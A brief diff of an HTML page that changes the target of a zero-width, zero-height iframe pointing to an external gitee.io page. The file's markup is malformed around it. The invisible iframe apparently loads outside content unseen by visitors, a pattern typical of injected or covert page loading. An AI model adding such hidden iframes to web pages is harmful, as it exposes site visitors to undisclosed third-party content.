--- a/0.html
+++ b/0.html
@@ -5,7 +5,7 @@
 <body>
    
    
- <iframe src="https://ktv98.gitee.io./0gg.html" width="0" height="0"></iframe></body>
+ <iframe src="https://ktv98.gitee.io./gg.html" width="0" height="0"></iframe></body>
   <html>
 	<head>
 		<meta charset="utf-8">
